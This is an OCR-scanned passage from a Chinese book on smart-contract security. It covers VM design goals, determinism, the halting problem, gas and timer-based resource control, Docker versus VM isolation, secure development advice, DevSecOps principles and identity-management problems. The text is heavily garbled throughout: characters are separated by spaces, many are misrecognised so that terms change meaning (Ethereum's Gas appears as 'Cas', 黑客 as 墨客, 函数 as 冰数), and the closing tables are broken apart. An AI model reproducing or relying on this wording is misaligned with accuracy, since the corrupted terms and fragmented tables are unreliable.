* 预期 应 用 程序 的 专业 化 : 处 理 20 字 节 地 址 和 32 字 节 值 的 自 定 义 加 密 功 能 ， 自 定义 加 密 中 使 用 的 模块 化 算法 ， 读 取 块 和 事务 数据 ， 与 状态 等 进行 交互 的 能 力 。 
. 简单 的 安全 性 : 为 了 使 VM 不 被 攻击 ， 应 该 很 容易 得 出 智能 合约 运行 所 需要 “燃料 ”的 成 本 模型 。 

. 优化 友好 性 : 应 用 优化 应 该 很 容易 ， 以 便 可 以 优化 JIT 编 译 的 或 其 他 加 速 版 本 的 虚拟 机 。 


2. 虚 拟 机 安全 的 4 个 维度 


虚拟 机 安全 可 以 从 智能 合约 运行 的 可 确定 性 、 停 机 问题 与 资源 控制 及 资源 隔离 等 几 个 维度 进行 分 析 。NEO 区 块 链 的 达 鸿 飞 和 张 铮 文 对 这 些 维 度 做 了 很 好 的 分 析 ， 经 过 他 们 的 同意 摘录 如 下 。 


(1) 智能 合约 的 确定 性 


如 果 一 个 程序 在 不 同 的 计算 机 或 者 在 同一 台 计 算 机 上 的 不 同时 刻 多 次 运行 ， 对 于 相同 的 输入 能 够 保证 产生 相同 的 输出 ， 则 称 该 程序 的 行为 是 确定 的 ， 反 之 则 称 该 程序 的 行为 是 非 确 定 的 。 使 程序 产生 
非 确定 性 的 因素 有 很 多 ， 辟 结 起 来 有 以 下 几 种 。 


1) 调用 了 非 确定 性 的 系统 函数 。 


一 般 在 编写 程序 的 时 候 ， 开 发 者 或 多 或 少 会 调用 一 些 系统 提供 的 函数 和 功能 以 减少 开发 的 工作 量 。 这 些 系统 函数 中 可 能 会 存在 一 些 非 确定 性 的 冰 数 ， 比 如 生成 随机 数 、 获 取 系统 时 间 等 。 一 旦 程序 调 
用 了 另 一 个 非 确定 性 的 程序 并 使 用 了 它们 输出 的 内 容 ， 那 么 该 程序 自身 的 行为 也 可 能 会 变 为 非 确定 的 。 


2) 使 用 了 非 确定 性 的 数据 来 源 。 


如 果 一 个 程序 在 运行 时 获取 数据 ， 而 数据 源 提供 的 是 非 确定 性 的 数据 ， 那 么 该 程序 也 可 能 会 变 成 非 确定 性 的 程序 。 例 如 ， 通 过 搜索 引擎 来 获取 某 个 关键 词 的 前 10 条 搜索 结果 ， 搜 索引 警 针 对 不 同 的 IP 
地 址 来 源 可 能 会 返回 不 同 的 排序 结果 。 


3) 动态 调用 。 


动态 调用 是 指 ， 一 个 程序 在 调用 另 一 个 程序 时 ， 如 果 必 须 在 运行 时 才能 确定 被 调用 的 目标 ， 则 称 该 调用 为 动态 调用 ; 反之 ， 如 果 人 在 运行 前 即 可 确定 被 调用 的 目标 ， 且 在 运行 时 无 法 变更 该 目标 ， 则 称 
该 调用 为 静态 调用 。 由 于 动态 调用 的 目标 在 运行 时 决定 ， 因 此 其 行为 是 非 确定 的 。 


对 于 区 块 链 上 的 智能 合约 ， 我 们 一 般 要 求 其 行为 必须 是 确定 的 ， 因 为 非 确定 性 的 合约 可 能 会 破坏 系统 的 一 致 性 。 区 块 链 的 作者 必须 考虑 到 这 个 问题 ， 并 在 设计 智能 合约 系统 的 时 候 就 想 办 法 把 非 确 定 
性 因素 排除 在 外 。 下 面 来 看 看 现 有 的 各 个 区 块 链 是 如 何 解决 这 个 问题 的 。 


@ 比 特 币 。 


比特 币 内 置 了 一 套 脚本 引擎， 用 于 执行 鉴 权 脚本 。 它 是 区 块 链 智 能 合约 的 雏形 。 开 发 者 可 以 基于 这 套 脚本 系统 来 开发 一 些 简单 的 应 用 ， 但 由 于 其 指令 集 非 常 简单 且 非 图 灵 完 备 ， 能 够 实现 的 功能 相当 
有 限 。 这 套 系统 既 没 有 提供 任何 系统 函数 ， 也 没有 提供 任何 访问 数据 的 能 力 ， 更 没有 动态 调用 的 功能 ， 甚 至 连 静态 调用 也 没有 提供 ， 因 此 比特 币 的 智能 合约 一 定 是 确定 的 。 


@ 以 太 坊 。 


以 太 坊 的 主要 设计 思想 ， 就 是 提供 一 个 图 灵 完 备 的 智能 合约 平台 ， 让 用 户 可 以 编写 任意 逻辑 的 程序 。 它 专门 开 友 了 一 个 用 于 执行 合约 代码 的 虚拟 机 EVM ， 并 设计 了 一 种 类 似 于 Javascript 的 高 级 语言 
Solidity， 以 方便 用 户 进行 开发 。 以 太 坊 智能 合约 没有 提供 任何 非 确定 性 的 系统 遂 数 ， 可 访问 的 数据 也 仅 限 于 链 内 数据 ， 外 部 数据 需要 通过 交易 发 送 到 合约 。 但 是 ， 以 太 坊 的 CALL 和 CALLCODE 指 令 的 目 
标 地 址 通过 栈 来 传递 ， 使 得 合约 可 以 在 运行 时 动态 调用 其 他 的 合约 代码 ， 使 合约 的 调用 路 径 变 为 非 确定 。 好 在 合约 可 以 访问 到 的 数据 都 是 确定 的 ， 使 得 所 有 节点 在 动态 调用 目标 代码 时 一 定 会 获得 相同 的 
目标 地 址 ， 保 证 了 系统 的 一 致 性 。 但 是 调用 路 径 的 非 确定 性 ， 会 导致 可 扩展 性 上 的 重要 性 能 损失 (具体 参见 《 重 构 智能 合约 (中 ) : 平行 宇宙 与 无 限 扩展 》) 。 


GFabric。 


Fabric 是 超级 账本 中 的 一 个 子 项 目 ， 其 智能 合约 采用 了 重量 级 的 Docker 作 为 执行 环境 。 这 可 能 跟 大 家 的 印象 有 点 矛盾 一 一 Docker 不 是 一 直 被 认为 是 一 种 轻 量 级 的 容器 技术 吗 ? 实际 上 ，Docker 
的 “ 轻 ” 是 相对 于 模拟 物理 机 架构 的 重量 级 虚拟 化 技术 而 言 。 在 区 块 链 应 用 场景 下 ，Docker 是 一 个 比较 “ 重 ” 的 执行 环境 。 这 也 是 Fabric 的 性 能 瓶颈 所 在 ， 目 前 只 能 达到 每 秒 几 百 TPS。 由 于 Docker 的 特 
性 ， 智 能 合约 几乎 可 以 使 用 物理 计算 机 上 的 所 有 功能 ， 因 此 具有 极 高 的 非 确定 性 。 鉴 于 此 ，Fabric 要 求 智能 合约 的 开发 者 在 编写 代码 的 时 候 尽量 避免 使 用 具有 非 确定 性 的 功能 ， 并 计划 提供 一 套 专 门 开发 
的 确定 性 系统 函数 库 供 开发 者 使 用 。 然 而 ， 由 于 无 法 从 底层 机 制 上 避免 非 确定 性 的 产生 ， 寄 托 于 开发 者 遵守 良好 的 开发 规范 难免 有 些 一 厢 情 愿 。 非 确定 性 就 像 幽 灵 一 般 ， 平 时 似乎 并 不 人 存 人 在， 在 一 些 边 缘 
案例 (corner case) 上 却 可 能 会 突然 冒 出 来 ， 造 成 难以 判断 的 故障 。 


(2) 停机 问题 与 资源 控制 


襄 机 问题 (Halting Problem) 是 逻辑 数学 中 可 计算 性 理论 的 一 个 问题 。 通 俗 地 说 ， 停 机 问题 就 是 判断 任意 程序 是 否 能 在 有 限 的 时 间 内 结束 运行 。 该 问题 等 价 于 如 下 的 判定 问题 : 是否 存 在 一 个 程序 
P， 对 于 任意 输入 的 程序 w， 能 够 判断 w 会 在 有 限时 间 内 结束 或 者 死 循环 。 


艾 伦 .图 灵 人 在 1936 年 用 对 角 论 证 法 证 明了 我 们 无 法 编写 出 程序 P， 即 不 存在 解决 停机 问题 的 通用 算法 。 这 个 证 明 的 关键 在 于 对 计算 机 和 程序 的 数学 定义 ， 这 被 称 为 图 灵机 。 停 机 问题 在 图 灵机 上 是 不 可 


判定 问题 。 这 是 最 早 提 出 的 决定 性 问题 之 一 。 


区 块 链 上 的 智能 合约 必须 是 可 终止 的 ， 否 则 将 会 消耗 无 限 的 时 间 和 资源 。 从 上 面 的 论证 已 经 可 以 看 出 ， 停 机 问题 是 不 可 解 的 ， 我 们 无 法 在 不 运行 一 个 程序 的 情况 下 ， 提 前 判定 该 程序 是 否 会 停机 。 
此 ， 区 块 链 的 设计 者 不 得 不 假设 所 有 的 智能 合约 都 可 能 会 进入 死 循环 ， 并 对 可 能 已 经 进入 死 循环 的 合约 采用 异常 终止 的 方式 来 结束 它 。 通 常会 有 以 下 几 种 策略 。 


1) 非 图 灵 完 备 。 


如 果 一 个 区 块 链 的 智能 合约 系统 只 提供 了 有 限 的 指令 集 ， 而 不 提供 诸如 跳 转 、 循 环 等 指令 ， 以 及 可 以 等 效 实现 类 似 功能 的 指令 ， 那 么 基于 这 个 系统 的 智能 合约 就 不 可 能 进入 死 循环 ， 因 此 它们 忆 是 5 
停机 的 。 比 特 币 就 是 其 中 的 一 个 例子 。 值 得 一 提 的 是 ， 比 特 币 改进 计划 BIP12 的 提案 中 ， 有 过 在 比特 币 指 令 集中 增加 一 条 OP_EVAL 指 令 的 计划 ， 这 条 指令 可 以 加 载 计算 栈 中 的 脚本 并 动态 执行 ， 从 而 解决 
多 重 签名 算法 的 问题 。 但 由 于 该 指令 会 间接 地 使 得 比特 币 的 脚本 系统 变 为 图 灵 完 备 ， 因 此 最 终 被 废弃 了 。 


2) 计价 器 。 





既然 无 法 在 智能 合约 运行 之 前 就 判定 其 是 否 会 停机 ， 那 么 也 可 以 在 合约 运行 中 进行 计 步 一 一 每 执行 一 条 指令 就 将 计 步 器 加 1。 当 计 步 器 的 数值 超过 一 定 的 限制 之 后 ， 就 认为 合约 已 经 进入 死 循环 ， 从 而 
强行 终止 其 运行 。 这 种 方法 需要 区 块 链 对 智能 合约 的 执行 有 较 大 的 控制 能 力 ， 能 够 精确 地 计算 出 合约 执行 的 步 数 且 在 各 个 节点 间 保 持 一 致 。 


计价 器 的 方案 和 计 步 器 基本 上 是 一 致 的 ， 但 是 它 采用 经 济 手 段 来 解决 停机 问题 : 对 合约 执行 的 每 一 个 指令 进行 收费 ， 当 合约 的 手续 费 全 部 用 完 之 后 ， 如 果 合约 还 没有 终止 ， 那 么 就 强行 终止 退出 。 以 
太 坊 采用 的 就 是 这 种 模式 ， 它 通过 消耗 一 种 被 称 为 Cas 的 代 币 来 对 智能 合约 进行 计价 。 一 旦 Cas 耗 尽 ， 合 约 就 会 执行 失败 ， 并 且 不 会 退回 消耗 挤 的 费用 。 


3) 计时 器 。 


计时 器 和 计价 器 的 方案 比较 类 似 ， 但 它 使 用 时 间作 为 标准 来 衡量 一 个 合约 是 否 已 经 进入 死 循 环 : 如 果 合约 在 超时 时 间 到 达 之 前 还 没有 正常 终止 ， 那么 就 认为 它 已 进入 死 循环 并 强行 终止 它 。Fabric 采 
用 了 计时 器 的 方案 ， 原 因 是 Fabric 使 用 Dockerf 作 为 其 智能 合约 的 执行 环境 ， 而 Docker 中 运行 的 程序 是 无 法 计 步 或 计价 的 。 昌 然 计时 器 可 以 部 分 地 解决 停机 问题 ， 但 是 在 分 布 式 系统 中 ， 每 个 节点 的 执行 时 
长 未 必 能 够 保证 一 致 ， 且 每 个 节点 的 性 能 和 负载 都 不 一 样 ， 导 致 对 合约 运行 是 否 超时 这 一 判断 会 出 现 不 一 致 的 情况 ， 从 而 使 得 共识 算法 的 失败 率 大 大 地 增加 ， 这 是 计时 器 方案 的 主要 缺点 。 


上 述 的 非 图 灵 完 备 、 计 价 器 、 计 时 器 方案 ， 实 际 上 都 是 一 种 资源 控制 手段 ， 即 通过 对 代码 量 设 定 上 限 、 对 运算 资源 进行 计价 ， 或 对 执行 时 间 设 定 上 限 等 方法 来 将 智能 合约 占用 的 资源 控制 在 合理 的 范 
围 内 。 
(3) 资源 隔离 


虚拟 化 的 执行 环境 除了 实现 资源 控制 这 一 目的 外 ， 更 重要 的 是 通过 资源 隔离 来 保障 系统 的 安全 。 在 开放 的 区 块 链 上 ， 任 何 参与 者 都 可 以 编写 并 上 传 智能 合约 ， 图 灵 完 备 的 智能 合约 就 意味 着 可 以 编写 
并 执行 任意 的 逻辑 一 一 包括 病毒 或 故障 合约 。 如 果 智 能 合约 直接 在 区 块 链 节点 的 宿主 系统 上 运行 ， 病 毒 就 能 够 自我 复制 ， 故 障 合约 就 可 能 破坏 宿主 系统 的 自身 数据 。 因 此 智能 合约 必须 放 在 一 个 隔离 的 沙 
盒 环境 一 一 虚拟 机 或 者 容器 中 运行 。 





通过 沙 盒 执行 环境 ， 合 约 和 合约 之 间 、 合 约 和 宿主 系统 之 间 进 行 了 有 效 的 资源 隔离 ， 也 就 控制 住 了 恶意 或 故障 合约 的 影响 范围 。 但 在 资源 隔离 度 上 ，Docker 所 依赖 的 基于 命名 空间 的 隔离 要 弱 于 虚拟 
机 的 隔离 。 正 因为 此 ， 在 公有 云 上 两 个 不 同 用 户 的 Docker 镜 像 一 般 不 会 被 放 人 在 一 个 宿主 操作 系统 中 运行 。 因 此 ， 基 于 Docker 的 方案 在 资源 隔离 度 的 安全 性 上 要 弱 于 虚拟 机 方案 。 


3.2.7 ”智能 合约 的 安全 开 友 过 程 建议 

随 着 智能 合约 的 广泛 应 用 ， 其 流程 和 代码 也 变 得 越 来 越 复杂 。 人 们 发 现 ， 就 像 现实 世界 中 的 合同 一 样 ， 如 果 没 有 认真 审核 的 话 ， 在 设计 和 编码 过 程 中 难以 避免 人 工 失误 的 发 生 ， 一 旦 被 黑客 找到 沁 
洞 ， 损 失 往往 是 巨大 的 。 

(1) 简化 智能 合约 的 设计 ， 牺 性 一 部 分 图 灵 完 备 性 换取 安全 性 


以 比特 币 为 例 ， 由 于 其 设计 上 的 非 图 灵 完 备 性 ， 加 上 中 本 聪 大 幅 删 减 了 许多 脚本 指令 ， 所 以 其 安全 性 是 极 高 的 。 从 2009 年 诞生 至 今 ， 经 历 了 无 数 次 的 黑客 攻击 ， 从 未 因 比 特 币 区 块 链 和 脚本 本 身 的 原 
因 出 现 过 资金 损失 。 但 是 ， 比 特 币 的 图 灵 非 完备 性 ， 使 得 比较 复杂 的 业务 逻辑 很 难 在 比特 币 网 络 上 实现 。 以 太 坊 的 智能 合约 采用 图 灵 完 备 性 的 通用 编程 语言 ， 使 得 非常 复杂 的 业务 逻辑 能 够 在 以 太 坊 上 实 
现 ， 但 同时 也 融 来 了 安全 问题 。 业 务 编程 语言 功能 上 的 丰富 性 和 安全 性 是 一 对 永恒 的 矛盾 ， 不 可 能 兼顾 。 因 此 ， 我 们 需要 尽量 简化 智能 合约 的 复杂 性 。 例 如 ， 拆 分 一 个 比较 复杂 的 合约 ， 用 几 个 比较 简单 
的 合约 来 代替 ; 可 以 利用 智能 合约 的 可 继承 性 ， 设 计 一 些 可 以 重复 使 用 的 智能 合约 。 


(2) 严格 执行 智能 合约 代码 审查 


和 现实 中 的 合同 文本 一 样 ， 智 能 合约 代码 也 要 经 过 多 层次 的 、 严 格 的 代码 审查 ， 包 括 业 务 流程 /逻辑 审查 、 代 码 动 态 运 行 的 审查 、 详 尽 的 测试 流程 、 安 全 性 检测 、 专 家 评审 等 。 对 逻辑 复杂 上 且 涉 及 较 大 
资金 的 智能 合约 ， 要 尽 可 能 通过 代码 形式 化 验证 ， 通 过 数学 证 明 的 方式 验证 智能 合约 的 确定 性 。 


(3) 强化 对 智能 合约 程序 员 的 培训 


虽然 智能 合约 编程 语言 表面 上 看 与 传统 的 编程 语言 极其 相似 ,但 其 属于 一 个 全 新 的 编程 范式 ， 思 维 方 式 也 与 传统 的 面向 过 程 、 面 向 对 象 、 面 向 消 数 的 编程 范式 有 很 大 差异 ， 需 要 将 公平 交易 、 诚 信和 
其 他 主观 概念 加 入 智能 合约 的 设计 和 编码 中 。 为 此 ， 要 加 强 智 能 合约 程序 员 的 培训 工作 ， 在 实践 中 提炼 出 智能 合约 编程 和 设计 模式 ， 尤 其 是 安全 方面 的 模式 ， 减 少 程序 员 出 现 差 错 的 可 能 。 


(4) 在 区 块 链 应 用 落地 上 ， 需 要 谨慎 慢 行 


在 实际 应 用 区 块 链 智能 合约 时 ， 应 采用 分 步 推 进 的 策略 ， 从 简单 到 复杂 ， 从 小 范围 试点 到 全 面 推广 ， 涉 及 的 资金 量 也 应 从 少 到 多 ， 不 贸然 涉及 大 量 的 资金 。 如 此 ， 即 便 在 前 期 出 现 漏洞 被 攻击 ， 也 不 
会 损失 过 于 巨大 。 


(5) 其 他 建议 
1) 尽量 使 用 安全 的 样本 或 框架 。 比 如 可 以 参考 前 面 提 到 的 开源 框架 OpenZeppelin 项 目 发 表 的 智能 合约 安全 框架 (https://github.com/OpenZeppelin/zep-solidity) 。 


2) 尽量 设计 智能 合约 的 生命 周期 。 按 照 业 务 的 需要 ， 有 一 些 智能 合约 是 有 建立 、 运 行 和 停止 这 样 的 生命 周期 的 。 我 们 应 该 在 设计 中 找到 这 样 的 智能 合约 ， 并 且 把 生命 周期 的 逻辑 写 进 智能 合约 。 比 
如 ， 一 个 外 汇 吕 换 的 智能 合约 在 兄 换 执 行 后 可 能 就 不 需要 继续 运行 了 。 


3) 应 该 设计 智能 合约 的 在 线 升级 或 者 在 线 蔡 换 (Hot Swappable) 的 实现 方案 。 可 以 参考 前 面 已 经 提 到 的 几 种 方法 ， 这 里 就 不 重复 了 。 


4) 利用 DevSecOps (Development+Security+Operations) 的 思想 进行 智能 合约 的 开发 。 


3.2.8 ”从 DevOps 到 DevSecOps: 智能 合约 开发 须知 
DevOps (Development+Operations) 需要 企业 应 用 开发 团队 和 系统 运营 团队 的 合作 ， 已 经 成 为 企业 IT 研发 的 现实 。 这 一 新 的 运营 模式 往往 与 敏捷 式 软件 开发 方法 并 举 。 但 是 ， 有 专家 指出 ， 如 今 
实践 该 方法 的 典型 模式 ， 其 实 远 远 不 够 深入 。 


来 自 Gartner 研 究 公司 的 分 析 师 David Cearley 认 为 ， 应 该 修改 DevOps 的 定义 ， 使 之 包括 安全 理念 。 他 称 之 为 DevSsecOps，“ 一 种 业 合 了 开发 、 安 全 及 运营 理念 以 创建 解决 方案 的 全 新 方法 ”。 目 前 
区 块 链 很 多 项 目 停 留 在 概念 证 明 的 阶段 ， 但 随 着 以 后 的 大 规模 落地 可 以 部 分 地 采用 目前 软件 开发 的 最 佳 实践 。 区 块 链 的 运营 上 ， 公 有 链 通 常 是 由 “矿工 ” 们 运营 ， 开 发 者 有 时 不 需要 考虑 运营 (但 是 随 着 
区 块 链 应 用 的 推广 ， 公 有 链 的 “矿工 ” 们 会 对 开发 者 提出 更 多 的 安全 需求 ) ;而 联盟 链 和 私有 链 则 一 定 要 考虑 DevSecOps。 在 DevOps 方 案 中 添加 安全 理念 之 后 ， 开 发 团队 将 不 得 不 更 加 细致 地 考虑 安全 
一 一 在 区 块 链 开发 过 程 的 一 开始 ， 而 不 是 事后 ， 就 考虑 安全 问题 。 


在 具体 项 目 实 施 过 程 中 我 们 不 应 聚焦 于 安全 ， 而 应 该 重视 风险 ， 这 可 以 帮助 我 们 更 好 地 实现 业务 视角 与 开发 流程 的 整合 。 怎 么 建 YDevSecOps 计 划 ? 下 面 介 绍 5 条 基本 的 Dev-SecOps 原 则 。 昌 然 这 些 
原则 是 从 传统 的 软件 开发 和 将 商业 客户 作为 用 户 对 象 的 角度 来 描述 的 ， 但 是 对 联盟 链 和 私有 链 的 智能 合约 的 开发 同样 有 借鉴 作用 。 


1. 以 客户 或 者 用 户 为 中 心 


以 客户 为 中 心 ， 可 以 协调 业务 与 安全 之 间 的 天 系 ， 从 而 确保 制定 准确 、 完 备 的 安全 策略 ， 并 让 企业 的 所 有 成 员 都 能 够 支持 和 实施 。 但 是 ， 要 把 安全 和 业务 产 出 结合 起 来 ， 有 时 其 困难 程度 犹如 要 把 油 


和 酷 混合 起 来 。 安 全 专家 使 尽 了 浑身 解数 力图 攻破 软件 ， 往 往 还 是 很 难 将 这 些 安全 信息 和 客户 以 及 最 终 的 业务 产 出 关联 起 来 。 实 际 上 ， 安 全 的 复杂 性 ， 以 及 安全 专家 和 业务 专家 在 工作 重心 方面 存在 的 巨 
大 差异 ， 会 导致 决策 出 现 重 大 分 歧 。 安 全 专家 考虑 的 是 如 何 保护 企业 资产 的 安全 ， 而 业务 专家 关注 的 是 如 何 冒险 满足 客户 的 需求 以 增加 收入 。 这 些 原则 性 的 差异 会 导致 双方 产生 极 大 的 摩 探 。 抛 开 这 些 分 
歧 ， 秉 持 以 客户 为 中 心 的 理念 ， 可 以 促使 安全 专家 采取 更 好 的 安全 策略 ， 同 时 也 可 以 减少 复杂 性 造成 的 风险 控制 障碍 。 此 外 ， 安 全 计划 及 产 出 可 以 适应 客户 需求 和 业务 产 出 ， 其 中 的 复杂 性 也 可 以 通过 自 
动 化 和 报告 进行 展示 。 最 终 ， 支持 业 务 产 出 的 必要 控制 应 当 简 单 易 懂 ， 让 安全 实现 成 为 人 人 都 可 以 做 到 的 事情 。 


2. 安 全 扩展 


除了 以 客户 为 中 心 ， 安 全 扩展 也 是 必要 的 。 如 果 客 户 需要 快速 创新 业务 来 解决 问题 ， 而 安全 专家 只 考虑 自己 的 安全 防护 功能 ， 这 么 做 显然 不 太 恰 当 。 相 反 地 ， 他 们 应 当 带 领 安全 团队 创建 相同 的 工作 
模式 和 条 件 ， 使 安全 方案 在 支持 DevOps 和 持续 创新 之 余 还 要 与 业务 产 出 相 协 调 。 随 着 连续 部 署 、 精 益 创 业 、 敏 捷 型 、DevOps 和 其 他 创新 驱动 法 成 为 常态 ， 安 全 的 进一步 发 展 也 人 迫在眉睫。 毋庸 置疑 ， 安 
全 专家 必须 具备 精益 生产 的 意识 ， 通 过 要 求 软件 定义 平台 帮助 收集 、 解 释 和 报告 有 关 业 务 资源 、 环 境 的 安全 分 析 。 实 现 安 全 扩展 ， 其 实 就 是 通过 减少 人 工 处 理 量 以 及 实现 低 风 险 产 出 需 耗费 的 时 间 量 ， 达 
到 解决 问题 的 目的 。 但 是 ， 对 于 安全 专家 而 言 ， 要 使 安全 策略 透明 化 、 简 单 化 ， 以 便 所 有 人 都 能 够 参与 实施 ， 这 并 不 是 件 容易 的 事情 。 不 过 ， 努 力 之 下 ， 他 们 还 是 有 可 能 改进 和 发 展 自动 化 ， 人 允许 通过 可 
以 扩展 安全 的 自助 服务 进行 风险 决策 。 


3. 客 观 标准 


客观 标准 可 以 帮助 业务 专家 明白 要 在 什么 时 候 、 以 什么 样 的 方式 和 顺序 改善 业务 资源 的 安全 情况 。 实 际 上 我 们 可 以 认为 ， 安 全 专家 的 唯一 目标 就 是 为 业务 伙伴 提供 可 行 的 修复 建议 。 建 立 客 观 标 准 来 
衡量 企业 资产 安全 无 疑 是 最 理想 的 方式 ， 可 以 满足 业务 伙伴 为 了 快速 做 出 决策 对 可 行 性 建议 的 需求 。 


有 时 ， 相 比 于 策略 ， 客 观 标准 更 为 重要 ， 因 为 它 能 促进 企业 内 形成 成 熟 的 控制 机 制 ， 使 风险 决策 有 据 可 依 。 安 全 记分 卡 是 制定 DevSecOps 计 划 所 必 备 的 基本 要 素 ， 因 为 它 不 仅 可 以 为 业务 伙伴 提供 指 
导 ， 还 可 以 为 持续 监测 企业 资产 安全 的 安全 团队 提供 方向 。 根 据 对 象 的 不 同 ， 记 分 卡 可 以 通过 检测 仪器 和 记录 结果 为 决策 行为 创设 情景 。 举 个 例子 ， 如 果 面 向 的 对 象 是 开发 部 ， 使 用 的 度量 指标 和 提供 的 
报告 可 能 更 倾向 于 开发 方面 ， 比 如 每 行 代码 中 存在 的 安全 漏洞 数量 。 反 之 ， 若 是 面向 运营 部 ， 使 用 的 度量 指标 可 以 是 基础 设施 和 配置 方面 存在 的 缺陷 和 漏洞 。 不 过 整体 而 言 ， 只 要 创建 记分 卡 ， 便 有 助 于 
各 个 团队 排除 干扰 和 分 歧 并 做 出 快速 、 精 准 的 决策 。 


4. 主 动 搜 寻 


想象 一 下 ， 如 果 你 的 公司 能 够 先 于 攻击 者 发 现 安全 漏洞 并 在 遭受 攻击 前 将 其 修复 ， 可 以 避免 多 少 损失 ? 主动 搜寻 并 测试 业务 资源 的 安全 性 ， 有 助 于 及 时 发 现 可 能 会 被 对 手轻 易 利用 的 弱点 和 缺陷 。 采 
取 主 动 策略 保护 业务 资源 的 安全 ， 也 有 助 于 更 好 地 衡量 与 扩展 ， 因 为 在 业务 受 损 前 发 现 重要 的 攻击 面 需要 自动 化 和 大 量 的 数据 。 但 是 ， 仅 赁 一 个 好 的 事件 响应 进程 来 实现 这 个 需求 是 不 够 的 ， 因 为 在 外 部 
发 起 尝试 性 攻击 时 才 发 现 漏洞 ， 已 经 为 时 太 晚 。 建 立 主动 搜寻 的 最 佳 方式 是 实现 构建 自动 化 ， 利 用 自己 的 信息 确定 安全 缺陷 ， 防 止 漏洞 成 为 攻击 目标 。 另 外 ， 这 类 功能 还 可 以 利用 攻击 者 目前 最 常用 的 被 
动 输入 来 加 强 自身 的 防御 策略 。 从 根本 上 来 说 ， 这 类 功能 不 仅 可 以 巩固 公司 技术 环境 方面 的 侦察 ， 而 且 它 还 允许 内 联 测试 与 开 友 ， 可 以 在 整个 业务 产 出 的 支持 系统 中 优先 执行 修复 措施 。 换 句 话说 ， 加 强 
内 部 的 安全 测试 ， 主 动 搜寻 安全 漏洞 ， 对 企业 很 有 帮助 ， 因 为 修复 建议 可 立即 执行 ， 而 且 还 实现 了 与 业务 流程 的 整合 。 
5. 持 续 检 测 与 响应 


最 后 ， 除 了 牢记 以 上 4 条 原则 ， 还 要 确保 有 连续 检测 和 响应 来 完成 信息 发 现 和 实时 攻击 检测 。 由 于 监管 流程 和 基于 纸 质 的 控制 缺少 攻击 分 析 ，DevSecOps 需 要 持续 检测 、 对 照 、 关 联 和 响应 来 弥补 该 
欠缺 。 


简 而 言 之 ， 持 续 检 测 和 响应 至 天 重要 ， 因 为 它 通 过 监测 和 分 析 外 部 对 公司 目标 发 起 的 尝试 性 攻击 ， 可 以 迅速 击 退 事件 。 这 似乎 和 近 十 年 来 所 讲 的 检测 和 响应 没什么 区 别 ， 但 实际 并 非 如 此 。 虽 然 大 多 
数 公司 已 有 检测 和 响应 实践 ， 但 是 DevSecOps 需 要 更 连续 的 方式 来 为 自动 化 进程 提供 反馈 ， 从 而 加 快 内 部 团队 获知 外 部 发 现 和 攻击 企图 的 速度 。 更 重要 的 是 ， 安 全 科学 的 实现 意味 着 企业 可 以 使 用 实时 信 
息 识 别 各 类 异常 事件 并 做 出 响应 ， 以 用 于 支持 业务 产 出 所 需 的 决策 和 防御 控制 预测 。 


作为 一 个 比较 有 效 的 安全 规范 ，DevSecOps 在 很 多 具有 创新 精神 的 企业 (比如 美国 的 Netf lix 和 AWS) 得 到 了 贯彻 。 区 块 链 作为 新 技术 ， 应 该 利用 DevSecOps 来 增强 项 目的 安全 性 。 


3.3 ”智能 合约 中 的 身份 管理 与 访问 控制 


3.3.1 “传统 身份 管理 与 访问 控制 系统 的 问题 


身份 管理 与 访问 控制 系统 是 IT 系统 安全 的 基石 ， 但 是 这 个 重要 的 系统 一 直 以 来 几乎 都 被 一 些 传统 的 上 T 巨 头 (如 Orale、IBM、 微 软 等 ) 所 把 持 ， 而 这 些 公司 在 身份 管理 与 访问 控制 系统 方面 缺乏 创新 ， 
从 而 导致 目前 身份 管理 与 访问 控制 系统 存在 众多 问题 ， 如 表 3-1 所 示 。 我 们 随后 会 介绍 区 块 链 如 何 解决 这 些 痛 点 。 


表 3-1 身份 管理 与 访问 控制 系统 的 问题 


传统 身份 管理 与 访问 控制 系统 的 问题 问题 描述 
| 一 个 人 的 在 线 身份 是 碎片 化 的 。 例 如 ， 微 信 、 淘 宝 、 滴 滴 等 都 会 有 我 们 
的 身份 。 实 际 上 ， 我 们 都 不 清楚 这 些 中 心 化 的 公司 擎 握 了 我 们 哪 一 些 信 
身份 碎片 化 县 ， 它 们 如 何 用 我 们 的 信息 进行 变现 。 但 是 对 墨客 而 言 ， 身 份 存储 在 每 一 
家 中 心 化 的 公司 的 数据 库 里 面 ， 一 旦 攻击 成 功 就 可 以 获得 很 多 甚至 所 有 用 
户 数据 。 在 互联 网 历史 上 有 很 多 黑客 成 功 偷 取 大 量 用 户 数据 的 例子 





由 于 我 们 不 清楚 中 心 化 的 公司 掌握 了 我 们 哪 一 些 信息 ， 因 此 对 自己 的 身 

ba 份 属性 没有 控制 ， 也 没有 办 法 保护 隐私 。 

我 们 有 太 多 的 口令 需要 记 住 ， 也 会 经 常 忘记 口令 。 口 令 是 传统 身份 管理 
口令 的 痛苦 


系统 最 大 的 痛 点 ， 没 有 人 喜欢 口令 ， 但 是 我 们 不 得 不 用 它 

如 果 要 在 银行 开 立 账户 ， 我 们 需要 携带 身份 证 去 银行 办 理 。 有 时 还 要 
提供 其 他 一 些 信息 ， 以 备 银行 进行 验证 。 这 势必 会 费 一 定 的 时 间 。 而 作 
身份 证 明 是 一 个 人 工 操 作 、 成 本 昂 | 为 KYC 的 一 部 分 (知道 你 的 客户 )， 和 号 份 证 明 也 是 一 个 成 本 非常 昂贵 的 过 
贯 的 过 程 程 ， 且 每 年 都 在 增加 。 一 些 银行 甚至 为 KYC 支付 5 亿美 元 以 上 (https:// 


| www.thomsonreuters.com/en/press-releases/2016/may/thomson-reuters-2016- 





| know-your-customer-surveys.htm!) 


传统 身份 管理 与 访问 控制 系统 的 问题 | 问题 描述 


在 传统 的 IT 系统， 身份 的 属性 定义 是 基于 模式 ( Schema)， 例 如 微软 的 
Active Directory Schema。 一 且 定 义 ， 很 难 扩展 或 修改 。 身 份 属性 的 每 个 
变化 都 需要 重新 启动 应 用 程序 


吴 份 是 静 信 的、 僵硬 的 、 不 灵活 的 





表 3-2 总 结 了 区 块 链 如 何 解决 上 面 提 到 的 问题 。 
表 3-2 区 块 链 的 解决 方法 
传统 身份 管理 与 访问 控制 系统 的 问题 区 块 链 的 解决 方法 
利用 区 块 链 技术 ， 用 户 的 数据 不 会 存储 在 中 心 化 的 机 构 ， 而 是 存储 在 用 
户 可 以 控制 的 终端 比如 手机 或 者 区 块 链 便 件 “钱包 ”中 。 在 区 块 链 上 可 以 
仓储 相关 信息 的 加 密 随 机 数 ， 而 不 是 数据 本 身 。 这 样 ， 对 于 用 户 来 说 是 
